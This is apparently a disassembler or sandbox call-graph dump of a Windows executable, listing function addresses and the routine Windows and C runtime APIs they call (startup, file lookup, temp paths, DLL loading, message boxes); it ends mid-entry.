API calls 16365->16368 16377 7ff7c71c4fbc 16366->16377 16370 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16367->16370 16371 7ff7c71cf804 16368->16371 16373 7ff7c71cf7b6 16370->16373 16372 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16371->16372 16374 7ff7c71cf80f 16372->16374 16373->16245 16374->16245 16375 7ff7c71d054c 51 API calls 16376 7ff7c71cf82b 16375->16376 16376->16374 16376->16375 16378 7ff7c71c4fe0 16377->16378 16384 7ff7c71c4fdb 16377->16384 16379 7ff7c71cb1c0 __CxxCallCatchBlock 45 API calls 16378->16379 16378->16384 16380 7ff7c71c4ffb 16379->16380 16385 7ff7c71cd9f4 16380->16385 16384->16376 16386 7ff7c71c501e 16385->16386 16387 7ff7c71cda09 16385->16387 16389 7ff7c71cda60 16386->16389 16387->16386 16393 7ff7c71d3374 16387->16393 16390 7ff7c71cda75 16389->16390 16392 7ff7c71cda88 16389->16392 16390->16392 16406 7ff7c71d26c0 16390->16406 16392->16384 16394 7ff7c71cb1c0 __CxxCallCatchBlock 45 API calls 16393->16394 16395 7ff7c71d3383 16394->16395 16396 7ff7c71d33ce 16395->16396 16405 7ff7c71d0348 EnterCriticalSection 16395->16405 16396->16386 16407 7ff7c71cb1c0 __CxxCallCatchBlock 45 API calls 16406->16407 16408 7ff7c71d26c9 16407->16408 17086 7ff7c71bccac 17107 7ff7c71bce7c 17086->17107 17089 7ff7c71bcdf8 17261 7ff7c71bd19c IsProcessorFeaturePresent 17089->17261 17090 7ff7c71bccc8 __scrt_acquire_startup_lock 17092 7ff7c71bce02 17090->17092 17097 7ff7c71bcce6 __scrt_release_startup_lock 17090->17097 17093 7ff7c71bd19c 7 API calls 17092->17093 17095 7ff7c71bce0d __CxxCallCatchBlock 17093->17095 17094 7ff7c71bcd0b 17096 7ff7c71bcd91 17113 7ff7c71bd2e4 17096->17113 17097->17094 17097->17096 17250 7ff7c71c9b9c 17097->17250 17099 7ff7c71bcd96 17116 7ff7c71b1000 17099->17116 17104 7ff7c71bcdb9 17104->17095 17257 7ff7c71bd000 17104->17257 17108 7ff7c71bce84 17107->17108 17109 7ff7c71bce90 __scrt_dllmain_crt_thread_attach 17108->17109 17110 7ff7c71bce9d 17109->17110 17111 7ff7c71bccc0 17109->17111 17110->17111 17268 7ff7c71bd8f8 17110->17268 17111->17089 17111->17090 17114 7ff7c71da540 __scrt_get_show_window_mode 17113->17114 17115 7ff7c71bd2fb GetStartupInfoW 17114->17115 17115->17099 17117 7ff7c71b1009 17116->17117 17295 7ff7c71c54f4 17117->17295 17119 7ff7c71b37fb 17302 7ff7c71b36b0 17119->17302 17124 7ff7c71bc5c0 _log10_special 8 API calls 17125 7ff7c71b3ca7 17124->17125 17255 7ff7c71bd328 GetModuleHandleW 17125->17255 17126 7ff7c71b391b 17478 7ff7c71b45b0 17126->17478 17127 7ff7c71b383c 17469 7ff7c71b1c80 17127->17469 17131 7ff7c71b385b 17374 7ff7c71b8a20 17131->17374 17132 7ff7c71b396a 17501 7ff7c71b2710 17132->17501 17136 7ff7c71b388e 17143 7ff7c71b38bb __std_exception_destroy 17136->17143 17473 7ff7c71b8b90 17136->17473 17137 7ff7c71b395d 17138 7ff7c71b3962 17137->17138 17139 7ff7c71b3984 17137->17139 17497 7ff7c71c00bc 17138->17497 17141 7ff7c71b1c80 49 API calls 17139->17141 17144 7ff7c71b39a3 17141->17144 17145 7ff7c71b8a20 14 API calls 17143->17145 17153 7ff7c71b38de __std_exception_destroy 17143->17153 17149 7ff7c71b1950 115 API calls 17144->17149 17145->17153 17146 7ff7c71b8b30 40 API calls 17147 7ff7c71b3a0b 17146->17147 17148 7ff7c71b8b90 40 API calls 17147->17148 17150 7ff7c71b3a17 17148->17150 17151 7ff7c71b39ce 17149->17151 17154 7ff7c71b8b90 40 API calls 17150->17154 17151->17131 17152 7ff7c71b39de 17151->17152 17155 7ff7c71b2710 54 API calls 17152->17155 17153->17146 17158 7ff7c71b390e __std_exception_destroy 17153->17158 17156 7ff7c71b3a23 17154->17156 17239 7ff7c71b3808 __std_exception_destroy 17155->17239 17157 7ff7c71b8b90 40 API calls 17156->17157 17157->17158 17159 7ff7c71b8a20 14 API calls 17158->17159 17160 7ff7c71b3a3b 17159->17160 17161 7ff7c71b3b2f 17160->17161 17162 7ff7c71b3a60 __std_exception_destroy 17160->17162 17163 7ff7c71b2710 54 API calls 17161->17163 17172 7ff7c71b3aab 17162->17172 17387 7ff7c71b8b30 17162->17387 17163->17239 17165 7ff7c71b8a20 14 API calls 17166 7ff7c71b3bf4 __std_exception_destroy 17165->17166 17167 7ff7c71b3d41 17166->17167 17168 7ff7c71b3c46 17166->17168 17512 7ff7c71b44d0 17167->17512 17169 7ff7c71b3c50 17168->17169 17170 7ff7c71b3cd4 17168->17170 17394 7ff7c71b90e0 17169->17394 17174 7ff7c71b8a20 14 API calls 17170->17174 17172->17165 17177 7ff7c71b3ce0 17174->17177 17175 7ff7c71b3d4f 17178 7ff7c71b3d71 17175->17178 17179 7ff7c71b3d65 17175->17179 17180 7ff7c71b3c61 17177->17180 17184 7ff7c71b3ced 17177->17184 17182 7ff7c71b1c80 49 API calls 17178->17182 17515 7ff7c71b4620 17179->17515 17186 7ff7c71b2710 54 API calls 17180->17186 17194 7ff7c71b3cc8 __std_exception_destroy 17182->17194 17187 7ff7c71b1c80 49 API calls 17184->17187 17186->17239 17190 7ff7c71b3d0b 17187->17190 17188 7ff7c71b3dc4 17444 7ff7c71b9400 17188->17444 17193 7ff7c71b3d12 17190->17193 17190->17194 17191 7ff7c71b3da7 SetDllDirectoryW LoadLibraryExW 17191->17188 17192 7ff7c71b3dd7 SetDllDirectoryW 17197 7ff7c71b3e0a 17192->17197 17241 7ff7c71b3e5a 17192->17241 17196 7ff7c71b2710 54 API calls 17193->17196 17194->17188 17194->17191 17196->17239 17199 7ff7c71b8a20 14 API calls 17197->17199 17198 7ff7c71b3ffc 17201 7ff7c71b4006 PostMessageW GetMessageW 17198->17201 17202 7ff7c71b4029 17198->17202 17205 7ff7c71b3e16 __std_exception_destroy 17199->17205 17200 7ff7c71b3f1b 17449 7ff7c71b33c0 17200->17449 17201->17202 17592 7ff7c71b3360 17202->17592 17207 7ff7c71b3ef2 17205->17207 17211 7ff7c71b3e4e 17205->17211 17210 7ff7c71b8b30 40 API calls 17207->17210 17210->17241 17211->17241 17518 7ff7c71b6db0 17211->17518 17239->17124 17241->17198 17241->17200 17251 7ff7c71c9bb3 17250->17251 17252 7ff7c71c9bd4 17250->17252 17251->17096 17253 7ff7c71ca448 45 API calls 17252->17253 17254 7ff7c71c9bd9 17253->17254 17256 7ff7c71bd339 17255->17256 17256->17104 17258 7ff7c71bd011 17257->17258 17259 7ff7c71bcdd0 17258->17259 17260 7ff7c71bd8f8 7 API calls 17258->17260 17259->17094 17260->17259 17262 7ff7c71bd1c2 __CxxCallCatchBlock __scrt_get_show_window_mode 17261->17262 17263 7ff7c71bd1e1 RtlCaptureContext RtlLookupFunctionEntry 17262->17263 17264 7ff7c71bd246 __scrt_get_show_window_mode 17263->17264 17265 7ff7c71bd20a RtlVirtualUnwind 17263->17265 17266 7ff7c71bd278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17264->17266 17265->17264 17267 7ff7c71bd2c6 __CxxCallCatchBlock 17266->17267 17267->17092 17269 7ff7c71bd900 17268->17269 17270 7ff7c71bd90a 17268->17270 17274 7ff7c71bdc94 17269->17274 17270->17111 17275 7ff7c71bd905 17274->17275 17276 7ff7c71bdca3 17274->17276 17278 7ff7c71bdd00 17275->17278 17282 7ff7c71bded0 17276->17282 17279 7ff7c71bdd2b 17278->17279 17280 7ff7c71bdd2f 17279->17280 17281 7ff7c71bdd0e DeleteCriticalSection 17279->17281 17280->17270 17281->17279 17286 7ff7c71bdd38 17282->17286 17287 7ff7c71bde22 TlsFree 17286->17287 17293 7ff7c71bdd7c __vcrt_InitializeCriticalSectionEx 17286->17293 17288 7ff7c71bddaa LoadLibraryExW 17290 7ff7c71bde49 17288->17290 17291 7ff7c71bddcb GetLastError 17288->17291 17289 7ff7c71bde69 GetProcAddress 17289->17287 17290->17289 17292 7ff7c71bde60 FreeLibrary 17290->17292 17291->17293 17292->17289 17293->17287 17293->17288 17293->17289 17294 7ff7c71bdded LoadLibraryExW 17293->17294 17294->17290 17294->17293 17298 7ff7c71cf4f0 17295->17298 17296 7ff7c71cf543 17297 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17296->17297 17300 7ff7c71cf56c 17297->17300 17298->17296 17299 7ff7c71cf596 17298->17299 17605 7ff7c71cf3c8 17299->17605 17300->17119 17613 7ff7c71bc8c0 17302->17613 17305 7ff7c71b3710 17615 7ff7c71b92f0 FindFirstFileExW 17305->17615 17306 7ff7c71b36eb GetLastError 17620 7ff7c71b2c50 17306->17620 17309 7ff7c71b3706 17314 7ff7c71bc5c0 _log10_special 8 API calls 17309->17314 17311 7ff7c71b3723 17635 7ff7c71b9370 CreateFileW 17311->17635 17312 7ff7c71b377d 17646 7ff7c71b94b0 17312->17646 17317 7ff7c71b37b5 17314->17317 17316 7ff7c71b378b 17316->17309 17321 7ff7c71b2810 49 API calls 17316->17321 17317->17239 17324 7ff7c71b1950 17317->17324 17319 7ff7c71b3734 17638 7ff7c71b2810 17319->17638 17320 7ff7c71b374c __vcrt_InitializeCriticalSectionEx 17320->17312 17321->17309 17325 7ff7c71b45b0 108 API calls 17324->17325 17326 7ff7c71b1985 17325->17326 17327 7ff7c71b1c43 17326->17327 17328 7ff7c71b7f80 83 API calls 17326->17328 17329 7ff7c71bc5c0 _log10_special 8 API calls 17327->17329 17330 7ff7c71b19cb 17328->17330 17331 7ff7c71b1c5e 17329->17331 17373 7ff7c71b1a03 17330->17373 17991 7ff7c71c0744 17330->17991 17331->17126 17331->17127 17333 7ff7c71c00bc 74 API calls 17333->17327 17334 7ff7c71b19e5 17335 7ff7c71b19e9 17334->17335 17336 7ff7c71b1a08 17334->17336 17337 7ff7c71c4f78 _get_daylight 11 API calls 17335->17337 17995 7ff7c71c040c 17336->17995 17340 7ff7c71b19ee 17337->17340 17998 7ff7c71b2910 17340->17998 17341 7ff7c71b1a45 17347 7ff7c71b1a7b 17341->17347 17348 7ff7c71b1a5c 17341->17348 17342 7ff7c71b1a26 17344 7ff7c71c4f78 _get_daylight 11 API calls 17342->17344 17345 7ff7c71b1a2b 17344->17345 17346 7ff7c71b2910 54 API calls 17345->17346 17346->17373 17350 7ff7c71b1c80 49 API calls 17347->17350 17349 7ff7c71c4f78 _get_daylight 11 API calls 17348->17349 17352 7ff7c71b1a61 17349->17352 17351 7ff7c71b1a92 17350->17351 17353 7ff7c71b1c80 49 API calls 17351->17353 17354 7ff7c71b2910 54 API calls 17352->17354 17355 7ff7c71b1add 17353->17355 17354->17373 17356 7ff7c71c0744 73 API calls 17355->17356 17357 7ff7c71b1b01 17356->17357 17358 7ff7c71b1b35 17357->17358 17359 7ff7c71b1b16 17357->17359 17361 7ff7c71c040c _fread_nolock 53 API calls 17358->17361 17360 7ff7c71c4f78 _get_daylight 11 API calls 17359->17360 17362 7ff7c71b1b1b 17360->17362 17363 7ff7c71b1b4a 17361->17363 17364 7ff7c71b2910 54 API calls 17362->17364 17365 7ff7c71b1b6f 17363->17365 17366 7ff7c71b1b50 17363->17366 17364->17373 18013 7ff7c71c0180 17365->18013 17367 7ff7c71c4f78 _get_daylight 11 API calls 17366->17367 17369 7ff7c71b1b55 17367->17369 17371 7ff7c71b2910 54 API calls 17369->17371 17371->17373 17372 7ff7c71b2710 54 API calls 17372->17373 17373->17333 17375 7ff7c71b8a2a 17374->17375 17376 7ff7c71b9400 2 API calls 17375->17376 17377 7ff7c71b8a49 GetEnvironmentVariableW 17376->17377 17378 7ff7c71b8ab2 17377->17378 17379 7ff7c71b8a66 ExpandEnvironmentStringsW 17377->17379 17380 7ff7c71bc5c0 _log10_special 8 API calls 17378->17380 17379->17378 17381 7ff7c71b8a88 17379->17381 17382 7ff7c71b8ac4 17380->17382 17383 7ff7c71b94b0 2 API calls 17381->17383 17382->17136 17384 7ff7c71b8a9a 17383->17384 17385 7ff7c71bc5c0 _log10_special 8 API calls 17384->17385 17386 7ff7c71b8aaa 17385->17386 17386->17136 17388 7ff7c71b9400 2 API calls 17387->17388 17389 7ff7c71b8b4c 17388->17389 17390 7ff7c71b9400 2 API calls 17389->17390 17391 7ff7c71b8b5c 17390->17391 18228 7ff7c71c82a8 17391->18228 17393 7ff7c71b8b6a __std_exception_destroy 17393->17172 17395 7ff7c71b90f5 17394->17395 18246 7ff7c71b8760 GetCurrentProcess OpenProcessToken 17395->18246 17398 7ff7c71b8760 7 API calls 17399 7ff7c71b9121 17398->17399 17400 7ff7c71b9154 17399->17400 17401 7ff7c71b913a 17399->17401 17403 7ff7c71b26b0 48 API calls 17400->17403 17402 7ff7c71b26b0 48 API calls 17401->17402 17404 7ff7c71b9152 17402->17404 17405 7ff7c71b9167 LocalFree LocalFree 17403->17405 17404->17405 17406 7ff7c71b9183 17405->17406 17409 7ff7c71b918f 17405->17409 18256 7ff7c71b2b50 17406->18256 17408 7ff7c71bc5c0 _log10_special 8 API calls 17410 7ff7c71b3c55 17408->17410 17409->17408 17410->17180 17411 7ff7c71b8850 17410->17411 17412 7ff7c71b8868 17411->17412 17413 7ff7c71b88ea GetTempPathW GetCurrentProcessId 17412->17413 17414 7ff7c71b888c 17412->17414 18265 7ff7c71b25c0 17413->18265 17416 7ff7c71b8a20 14 API calls 17414->17416 17418 7ff7c71b8898 17416->17418 17417 7ff7c71b8918 __std_exception_destroy 17430 7ff7c71b8955 __std_exception_destroy 17417->17430 18269 7ff7c71c8bd8 17417->18269 18272 7ff7c71b81c0 17418->18272 17429 7ff7c71bc5c0 _log10_special 8 API calls 17431 7ff7c71b3cbb 17429->17431 17435 7ff7c71b9400 2 API calls 17430->17435 17443 7ff7c71b89c4 __std_exception_destroy 17430->17443 17431->17180 17431->17194 17436 7ff7c71b89a1 17435->17436 17437 7ff7c71b89a6 17436->17437 17438 7ff7c71b89d9 17436->17438 17443->17429 17445 7ff7c71b9422 MultiByteToWideChar 17444->17445 17447 7ff7c71b9446 17444->17447 17445->17447 17448 7ff7c71b945c __std_exception_destroy 17445->17448 17446 7ff7c71b9463 MultiByteToWideChar 17446->17448 17447->17446 17447->17448 17448->17192 17461 7ff7c71b33ce __scrt_get_show_window_mode 17449->17461 17450 7ff7c71b35c7 17451 7ff7c71bc5c0 _log10_special 8 API calls 17450->17451 17452 7ff7c71b3664 17451->17452 17452->17239 17468 7ff7c71b90c0 LocalFree 17452->17468 17454 7ff7c71b1c80 49 API calls 17454->17461 17455 7ff7c71b35e2 17457 7ff7c71b2710 54 API calls 17455->17457 17457->17450 17460 7ff7c71b35c9 17463 7ff7c71b2710 54 API calls 17460->17463 17461->17450 17461->17454 17461->17455 17461->17460 17462 7ff7c71b2a50 54 API calls 17461->17462 17466 7ff7c71b35d0 17461->17466 18434 7ff7c71b4550 17461->18434 18440 7ff7c71b7e10 17461->18440 18452 7ff7c71b1600 17461->18452 18500 7ff7c71b7110 17461->18500 18504 7ff7c71b4180 17461->18504 18548 7ff7c71b4440 17461->18548 17462->17461 17463->17450 17467 7ff7c71b2710 54 API calls 17466->17467 17467->17450 17470 7ff7c71b1ca5 17469->17470 17471 7ff7c71c49f4 49 API calls 17470->17471 17472 7ff7c71b1cc8 17471->17472 17472->17131 17474 7ff7c71b9400 2 API calls 17473->17474 17475 7ff7c71b8ba4 17474->17475 17476 7ff7c71c82a8 38 API calls 17475->17476 17477 7ff7c71b8bb6 __std_exception_destroy 17476->17477 17477->17143 17479 7ff7c71b45bc 17478->17479 17480 7ff7c71b9400 2 API calls 17479->17480 17481 7ff7c71b45e4 17480->17481 17482 7ff7c71b9400 2 API calls 17481->17482 17483 7ff7c71b45f7 17482->17483 18715 7ff7c71c6004 17483->18715 17486 7ff7c71bc5c0 _log10_special 8 API calls 17487 7ff7c71b392b 17486->17487 17487->17132 17488 7ff7c71b7f80 17487->17488 17489 7ff7c71b7fa4 17488->17489 17490 7ff7c71c0744 73 API calls 17489->17490 17492 7ff7c71b807b __std_exception_destroy 17489->17492 17491 7ff7c71b7fc0 17490->17491 17491->17492 19106 7ff7c71c7938 17491->19106 17492->17137 17494 7ff7c71c0744 73 API calls 17496 7ff7c71b7fd5 17494->17496 17495 7ff7c71c040c _fread_nolock 53 API calls 17495->17496 17496->17492 17496->17494 17496->17495 17498 7ff7c71c00ec 17497->17498 19121 7ff7c71bfe98 17498->19121 17500 7ff7c71c0105 17500->17132 17502 7ff7c71bc8c0 17501->17502 17503 7ff7c71b2734 GetCurrentProcessId 17502->17503 17504 7ff7c71b1c80 49 API calls 17503->17504 17505 7ff7c71b2787 17504->17505 17506 7ff7c71c49f4 49 API calls 17505->17506 17507 7ff7c71b27cf 17506->17507 17508 7ff7c71b2620 12 API calls 17507->17508 17509 7ff7c71b27f1 17508->17509 17510 7ff7c71bc5c0 _log10_special 8 API calls 17509->17510 17511 7ff7c71b2801 17510->17511 17511->17239 17513 7ff7c71b1c80 49 API calls 17512->17513 17514 7ff7c71b44ed 17513->17514 17514->17175 17516 7ff7c71b1c80 49 API calls 17515->17516 17517 7ff7c71b4650 17516->17517 17517->17194 17519 7ff7c71b6dc5 17518->17519 17520 7ff7c71b3e6c 17519->17520 17521 7ff7c71c4f78 _get_daylight 11 API calls 17519->17521 17524 7ff7c71b7330 17520->17524 17522 7ff7c71b6dd2 17521->17522 17523 7ff7c71b2910 54 API calls 17522->17523 17523->17520 19132 7ff7c71b1470 17524->19132 17526 7ff7c71b7358 19238 7ff7c71b6350 17592->19238 17600 7ff7c71b3399 17601 7ff7c71b3670 17600->17601 17612 7ff7c71c54dc EnterCriticalSection 17605->17612 17614 7ff7c71b36bc GetModuleFileNameW 17613->17614 17614->17305 17614->17306 17616 7ff7c71b9342 17615->17616 17617 7ff7c71b932f FindClose 17615->17617 17618 7ff7c71bc5c0 _log10_special 8 API calls 17616->17618 17617->17616 17619 7ff7c71b371a 17618->17619 17619->17311 17619->17312 17621 7ff7c71bc8c0 17620->17621 17622 7ff7c71b2c70 GetCurrentProcessId 17621->17622 17651 7ff7c71b26b0 17622->17651 17624 7ff7c71b2cb9 17655 7ff7c71c4c48 17624->17655 17627 7ff7c71b26b0 48 API calls 17628 7ff7c71b2d34 FormatMessageW 17627->17628 17630 7ff7c71b2d7f MessageBoxW 17628->17630 17631 7ff7c71b2d6d 17628->17631 17633 7ff7c71bc5c0 _log10_special 8 API calls 17630->17633 17632 7ff7c71b26b0 48 API calls 17631->17632 17632->17630 17634 7ff7c71b2daf 17633->17634 17634->17309 17636 7ff7c71b93b0 GetFinalPathNameByHandleW CloseHandle 17635->17636 17637 7ff7c71b3730 17635->17637 17636->17637 17637->17319 17637->17320 17639 7ff7c71b2834 17638->17639 17640 7ff7c71b26b0 48 API calls 17639->17640 17641 7ff7c71b2887 17640->17641 17642 7ff7c71c4c48 48 API calls 17641->17642 17643 7ff7c71b28d0 MessageBoxW 17642->17643 17644 7ff7c71bc5c0 _log10_special 8 API calls 17643->17644 17645 7ff7c71b2900 17644->17645 17645->17309 17647 7ff7c71b9505 17646->17647 17648 7ff7c71b94da WideCharToMultiByte 17646->17648 17649 7ff7c71b9522 WideCharToMultiByte 17647->17649 17650 7ff7c71b951b __std_exception_destroy 17647->17650 17648->17647 17648->17650 17649->17650 17650->17316 17652 7ff7c71b26d5 17651->17652 17653 7ff7c71c4c48 48 API calls 17652->17653 17654 7ff7c71b26f8 17653->17654 17654->17624 17656 7ff7c71c4ca2 17655->17656 17657 7ff7c71c4cc7 17656->17657 17659 7ff7c71c4d03 17656->17659 17658 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17657->17658 17661 7ff7c71c4cf1 17658->17661 17673 7ff7c71c3000 17659->17673 17663 7ff7c71bc5c0 _log10_special 8 API calls 17661->17663 17662 7ff7c71c4de4 17664 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17662->17664 17665 7ff7c71b2d04 17663->17665 17664->17661 17665->17627 17667 7ff7c71c4e0a 17667->17662 17669 7ff7c71c4e14 17667->17669 17668 7ff7c71c4db9 17670 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17668->17670 17672 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17669->17672 17670->17661 17671 7ff7c71c4db0 17671->17662 17671->17668 17672->17661 17674 7ff7c71c303e 17673->17674 17675 7ff7c71c302e 17673->17675 17676 7ff7c71c3047 17674->17676 17680 7ff7c71c3075 17674->17680 17677 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17675->17677 17678 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17676->17678 17679 7ff7c71c306d 17677->17679 17678->17679 17679->17662 17679->17667 17679->17668 17679->17671 17680->17675 17680->17679 17684 7ff7c71c3a14 17680->17684 17717 7ff7c71c3460 17680->17717 17754 7ff7c71c2bf0 17680->17754 17685 7ff7c71c3a56 17684->17685 17686 7ff7c71c3ac7 17684->17686 17687 7ff7c71c3af1 17685->17687 17688 7ff7c71c3a5c 17685->17688 17689 7ff7c71c3b20 17686->17689 17690 7ff7c71c3acc 17686->17690 17777 7ff7c71c1dc4 17687->17777 17691 7ff7c71c3a61 17688->17691 17692 7ff7c71c3a90 17688->17692 17695 7ff7c71c3b2f 17689->17695 17697 7ff7c71c3b37 17689->17697 17698 7ff7c71c3b2a 17689->17698 17693 7ff7c71c3b01 17690->17693 17694 7ff7c71c3ace 17690->17694 17691->17697 17699 7ff7c71c3a67 17691->17699 17692->17695 17692->17699 17784 7ff7c71c19b4 17693->17784 17705 7ff7c71c3add 17694->17705 17707 7ff7c71c3a70 17694->17707 17716 7ff7c71c3b60 17695->17716 17795 7ff7c71c21d4 17695->17795 17791 7ff7c71c471c 17697->17791 17698->17687 17698->17695 17703 7ff7c71c3aa2 17699->17703 17699->17707 17713 7ff7c71c3a8b 17699->17713 17703->17716 17767 7ff7c71c4504 17703->17767 17705->17687 17708 7ff7c71c3ae2 17705->17708 17707->17716 17757 7ff7c71c41c8 17707->17757 17708->17716 17773 7ff7c71c45c8 17708->17773 17709 7ff7c71bc5c0 _log10_special 8 API calls 17711 7ff7c71c3e5a 17709->17711 17711->17680 17715 7ff7c71c3d4c 17713->17715 17713->17716 17802 7ff7c71c4830 17713->17802 17715->17716 17808 7ff7c71cea78 17715->17808 17716->17709 17718 7ff7c71c3484 17717->17718 17719 7ff7c71c346e 17717->17719 17720 7ff7c71c34c4 17718->17720 17723 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17718->17723 17719->17720 17721 7ff7c71c3a56 17719->17721 17722 7ff7c71c3ac7 17719->17722 17720->17680 17724 7ff7c71c3af1 17721->17724 17725 7ff7c71c3a5c 17721->17725 17726 7ff7c71c3b20 17722->17726 17727 7ff7c71c3acc 17722->17727 17723->17720 17732 7ff7c71c1dc4 38 API calls 17724->17732 17728 7ff7c71c3a61 17725->17728 17729 7ff7c71c3a90 17725->17729 17733 7ff7c71c3b37 17726->17733 17735 7ff7c71c3b2a 17726->17735 17740 7ff7c71c3b2f 17726->17740 17730 7ff7c71c3b01 17727->17730 17731 7ff7c71c3ace 17727->17731 17728->17733 17736 7ff7c71c3a67 17728->17736 17729->17736 17729->17740 17738 7ff7c71c19b4 38 API calls 17730->17738 17734 7ff7c71c3a70 17731->17734 17743 7ff7c71c3add 17731->17743 17749 7ff7c71c3a8b 17732->17749 17737 7ff7c71c471c 45 API calls 17733->17737 17739 7ff7c71c41c8 47 API calls 17734->17739 17752 7ff7c71c3b60 17734->17752 17735->17724 17735->17740 17736->17734 17741 7ff7c71c3aa2 17736->17741 17736->17749 17737->17749 17738->17749 17739->17749 17742 7ff7c71c21d4 38 API calls 17740->17742 17740->17752 17744 7ff7c71c4504 46 API calls 17741->17744 17741->17752 17742->17749 17743->17724 17745 7ff7c71c3ae2 17743->17745 17744->17749 17747 7ff7c71c45c8 37 API calls 17745->17747 17745->17752 17746 7ff7c71bc5c0 _log10_special 8 API calls 17748 7ff7c71c3e5a 17746->17748 17747->17749 17748->17680 17750 7ff7c71c4830 45 API calls 17749->17750 17749->17752 17753 7ff7c71c3d4c 17749->17753 17750->17753 17751 7ff7c71cea78 46 API calls 17751->17753 17752->17746 17753->17751 17753->17752 17974 7ff7c71c1038 17754->17974 17758 7ff7c71c41ee 17757->17758 17820 7ff7c71c0bf0 17758->17820 17762 7ff7c71c4333 17765 7ff7c71c4830 45 API calls 17762->17765 17766 7ff7c71c43c1 17762->17766 17764 7ff7c71c4830 45 API calls 17764->17762 17765->17766 17766->17713 17769 7ff7c71c4539 17767->17769 17768 7ff7c71c457e 17768->17713 17769->17768 17770 7ff7c71c4557 17769->17770 17771 7ff7c71c4830 45 API calls 17769->17771 17772 7ff7c71cea78 46 API calls 17770->17772 17771->17770 17772->17768 17775 7ff7c71c45e9 17773->17775 17774 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17776 7ff7c71c461a 17774->17776 17775->17774 17775->17776 17776->17713 17778 7ff7c71c1df7 17777->17778 17779 7ff7c71c1e26 17778->17779 17781 7ff7c71c1ee3 17778->17781 17783 7ff7c71c1e63 17779->17783 17947 7ff7c71c0c98 17779->17947 17782 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17781->17782 17782->17783 17783->17713 17785 7ff7c71c19e7 17784->17785 17786 7ff7c71c1a16 17785->17786 17788 7ff7c71c1ad3 17785->17788 17787 7ff7c71c0c98 12 API calls 17786->17787 17790 7ff7c71c1a53 17786->17790 17787->17790 17789 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17788->17789 17789->17790 17790->17713 17792 7ff7c71c475f 17791->17792 17794 7ff7c71c4763 __crtLCMapStringW 17792->17794 17955 7ff7c71c47b8 17792->17955 17794->17713 17796 7ff7c71c2207 17795->17796 17797 7ff7c71c2236 17796->17797 17799 7ff7c71c22f3 17796->17799 17798 7ff7c71c0c98 12 API calls 17797->17798 17801 7ff7c71c2273 17797->17801 17798->17801 17800 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17799->17800 17800->17801 17801->17713 17803 7ff7c71c4847 17802->17803 17959 7ff7c71cda28 17803->17959 17809 7ff7c71ceaa9 17808->17809 17818 7ff7c71ceab7 17808->17818 17810 7ff7c71cead7 17809->17810 17811 7ff7c71c4830 45 API calls 17809->17811 17809->17818 17812 7ff7c71ceb0f 17810->17812 17813 7ff7c71ceae8 17810->17813 17811->17810 17815 7ff7c71ceb39 17812->17815 17816 7ff7c71ceb9a 17812->17816 17812->17818 17967 7ff7c71d0110 17813->17967 17815->17818 17819 7ff7c71cf910 _fread_nolock MultiByteToWideChar 17815->17819 17817 7ff7c71cf910 _fread_nolock MultiByteToWideChar 17816->17817 17817->17818 17818->17715 17819->17818 17821 7ff7c71c0c16 17820->17821 17822 7ff7c71c0c27 17820->17822 17828 7ff7c71ce5e0 17821->17828 17822->17821 17823 7ff7c71cd66c _fread_nolock 12 API calls 17822->17823 17824 7ff7c71c0c54 17823->17824 17825 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17824->17825 17827 7ff7c71c0c68 17824->17827 17825->17827 17826 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17826->17821 17827->17826 17829 7ff7c71ce630 17828->17829 17830 7ff7c71ce5fd 17828->17830 17829->17830 17832 7ff7c71ce662 17829->17832 17831 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17830->17831 17847 7ff7c71c4311 17831->17847 17838 7ff7c71ce775 17832->17838 17840 7ff7c71ce6aa 17832->17840 17833 7ff7c71ce867 17874 7ff7c71cdacc 17833->17874 17835 7ff7c71ce82d 17867 7ff7c71cde64 17835->17867 17837 7ff7c71ce7fc 17860 7ff7c71ce144 17837->17860 17838->17833 17838->17835 17838->17837 17841 7ff7c71ce7bf 17838->17841 17843 7ff7c71ce7b5 17838->17843 17845 7ff7c71ca514 __std_exception_copy 37 API calls 17840->17845 17840->17847 17850 7ff7c71ce374 17841->17850 17843->17835 17844 7ff7c71ce7ba 17843->17844 17844->17837 17844->17841 17846 7ff7c71ce762 17845->17846 17846->17847 17848 7ff7c71ca970 _isindst 17 API calls 17846->17848 17847->17762 17847->17764 17849 7ff7c71ce8c4 17848->17849 17883 7ff7c71d411c 17850->17883 17854 7ff7c71ce41c 17855 7ff7c71ce471 17854->17855 17857 7ff7c71ce43c 17854->17857 17859 7ff7c71ce420 17854->17859 17936 7ff7c71cdf60 17855->17936 17932 7ff7c71ce21c 17857->17932 17859->17847 17861 7ff7c71d411c 38 API calls 17860->17861 17862 7ff7c71ce18e 17861->17862 17863 7ff7c71d3b64 37 API calls 17862->17863 17864 7ff7c71ce1de 17863->17864 17865 7ff7c71ce1e2 17864->17865 17866 7ff7c71ce21c 45 API calls 17864->17866 17865->17847 17866->17865 17868 7ff7c71d411c 38 API calls 17867->17868 17869 7ff7c71cdeaf 17868->17869 17870 7ff7c71d3b64 37 API calls 17869->17870 17871 7ff7c71cdf07 17870->17871 17872 7ff7c71cdf0b 17871->17872 17873 7ff7c71cdf60 45 API calls 17871->17873 17872->17847 17873->17872 17875 7ff7c71cdb44 17874->17875 17876 7ff7c71cdb11 17874->17876 17878 7ff7c71cdb5c 17875->17878 17879 7ff7c71cdbdd 17875->17879 17877 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17876->17877 17882 7ff7c71cdb3d __scrt_get_show_window_mode 17877->17882 17880 7ff7c71cde64 46 API calls 17878->17880 17881 7ff7c71c4830 45 API calls 17879->17881 17879->17882 17880->17882 17881->17882 17882->17847 17884 7ff7c71d416f fegetenv 17883->17884 17885 